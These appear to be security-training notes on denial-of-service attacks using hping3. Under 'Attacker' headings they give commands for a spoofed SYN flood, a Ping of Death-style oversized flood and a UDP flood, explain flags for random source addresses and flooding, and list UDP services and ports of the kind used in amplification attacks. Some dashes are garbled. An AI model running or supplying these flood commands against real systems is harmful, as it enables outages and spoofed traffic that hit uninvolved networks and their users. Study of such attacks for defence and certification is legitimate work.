hping3 -S [Target IP] -a [Spoofable IP] -p 22 -flood
-S: Set the SYN flag
-a: Spoof the IP address
-p: Specify the destination port
โ flood: Send a huge number of packets
Attacker (Perform PoD)
hping3 -d 65538 -S -p 21 โflood [Target IP]
-d: Specify data size
-S: Set the SYN flag
Attacker (Perform UDP application layer flood attack)
nmap -p 139 (check service)
hping3 -2 -p 139 โflood [IP]
Other Hping3 flags
--udp -> specifies sending the UDP packets to the target host
-2 -> specifies UDP mode
--rand-source -> enables random source mode
--data -> specifies the data body size
-d -> specifies the data size
-S -> sets the SYN flag
-p -> assigning the port to send the traffic
-c -> count of packets sent
--flood -> performs TCP flooding (sends a huge # of packets)
Other UDP-based applications and their ports
CharGen UDP Port 19
SNMPv2 UDP Port 161
QOTD UDP Port 17
RPC UDP Port 135
SSDP UDP Port 1900
CLDAP UDP Port 389
TFTP UDP Port 69
NetBIOS UDP Port 137,138,139
NTP UDP Port 123
Quake Network Protocol UDP Port 26000
VoIP UDP Port 5060
Last updated